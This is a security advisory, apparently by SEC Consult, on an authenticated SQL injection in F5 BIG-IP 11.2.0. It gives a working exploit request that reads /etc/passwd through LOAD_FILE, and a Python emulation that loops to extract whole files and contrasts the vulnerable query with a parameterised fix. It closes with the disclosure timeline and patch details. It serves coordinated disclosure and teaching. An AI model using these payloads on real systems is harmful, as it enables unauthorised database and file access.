title: SQL Injection
product: F5 BIG-IP
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility and ensures your applications
are fast, secure, and available."
URL: http://www.f5.com/products/big-ip/
A SQL injection vulnerability exists in a BIG-IP component. It enables an
authenticated attacker to access the MySQL database with the rights of the
MySQL user "root" (the highest privileges).
Furthermore, an attacker can read files from the file system with the rights of
the "mysql" OS user, i.e. the account the MySQL server process runs under.
The following exploit shows how files can be extracted from the file system:
POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=VALID_COOKIE
Content-Length: 119

{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),1,60)) -- x"
}
Note: the injected value closes the string literal of defaultQuery, appends an
assignment to the neighbouring ext1 column and comments out the remainder of
the UPDATE statement. The target fields are only VARCHAR(60), thus MID() is
used to extract the file in 60-byte slices. MySQL string positions are 1-based
(MID() with position 0 returns an empty string), so the first slice starts at
position 1 and the next one at 61. LOAD_FILE() requires the FILE privilege,
which the MySQL "root" user holds.
A subsequent request to /sam/admin/reports/php/getSettings.php returns the
leaked data in the ext1 field:
HTTP/1.1 200 OK
…
{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}
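The following is an added example, not code from the advisory or from F5. It emulates the flaw class behind saveSettings.php/getSettings.php with an in-memory SQLite table (the real BIG-IP schema and PHP code are not on the page; the table, the file contents and the function names are constructed for illustration). SQLite has no LOAD_FILE() or MID(), so both are registered as user functions with MySQL's semantics, including the 1-based position rule. The example goes beyond the single request shown above: it loops over 60-byte slices to recover a file that is longer than one VARCHAR(60) field, and shows the parameterised UPDATE that would have prevented the injection.

```python
import sqlite3

# Constructed stand-in for the reports settings table behind saveSettings.php /
# getSettings.php. Only the column names seen in the getSettings.php response
# are used; the real schema is not known from the advisory.
SCHEMA = """
CREATE TABLE settings (
    id           INTEGER PRIMARY KEY,
    user         TEXT,
    defaultQuery TEXT,
    ext1         TEXT,
    ext2         TEXT
);
INSERT INTO settings VALUES (2, 'admin', '', '', '');
"""

# Constructed file contents standing in for the MySQL server's file system.
FAKE_FILES = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "bin:x:1:1:bin:/bin:/sbin/nologin\n"
        "daemon:x:2:2:daemon:/sbin:/sbin/nologin\n"
    ),
}


def _load_file(path):
    # MySQL LOAD_FILE() returns NULL for missing or unreadable files.
    return FAKE_FILES.get(path)


def _mid(s, pos, length):
    # MySQL MID()/SUBSTRING() semantics: positions are 1-based and
    # position 0 yields the empty string, so a PoC must start at 1.
    if s is None:
        return None
    if pos == 0:
        return ""
    return s[pos - 1:pos - 1 + length]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.executescript(SCHEMA)
    # Register emulations under the MySQL function names used by the payload.
    conn.create_function("LOAD_FILE", 1, _load_file)
    conn.create_function("MID", 3, _mid)
    return conn


def save_settings_vulnerable(conn, setting_id, default_query):
    # The flaw class: the JSON value is spliced into the UPDATE as a literal.
    sql = "UPDATE settings SET defaultQuery='%s' WHERE id=%d" % (default_query, setting_id)
    conn.execute(sql)


def save_settings_safe(conn, setting_id, default_query):
    # Fix: bind the value; quotes and comment markers stay inside the literal.
    conn.execute("UPDATE settings SET defaultQuery=? WHERE id=?",
                 (default_query, setting_id))


def get_settings(conn, setting_id):
    row = conn.execute("SELECT id, user, defaultQuery, ext1, ext2 "
                       "FROM settings WHERE id=?", (setting_id,)).fetchone()
    return dict(row)


def injection_payload(path, pos, length=60):
    # Same shape as the advisory's defaultQuery value: close the string
    # literal, assign the neighbouring ext1 column, comment out the rest.
    return "XX', ext1=(SELECT MID(LOAD_FILE('%s'),%d,%d)) -- x" % (path, pos, length)


def leak_chunk(conn, path, pos, length=60):
    save_settings_vulnerable(conn, 2, injection_payload(path, pos, length))
    return get_settings(conn, 2)["ext1"]


def extract_file(conn, path, chunk=60):
    # Walk the file 60 bytes at a time, since ext1 is only VARCHAR(60).
    out, pos = "", 1
    while True:
        piece = leak_chunk(conn, path, pos, chunk)
        if not piece:
            break
        out += piece
        if len(piece) < chunk:
            break
        pos += chunk
    return out


if __name__ == "__main__":
    db = make_db()
    print(extract_file(db, "/etc/passwd"))
```

Running the module prints the whole constructed passwd file reassembled from three UPDATE/SELECT round trips; the first slice is the same 60 bytes as in the response above. Feeding the identical payload through save_settings_safe() stores it verbatim in defaultQuery and leaves ext1 untouched.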
The vulnerability has been verified to exist in F5 BIG-IP version 11.2.0.
Successful exploitation was possible with the Application Security Manager
(ASM) or Access Policy Manager (APM) module enabled.
Vendor contact timeline:
2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and
11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.
Solution: Update to 11.2.0 HF3 or 11.2.1 HF3.
Workaround: No workaround available.
Advisory URL: https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF S. Viehbock / @2013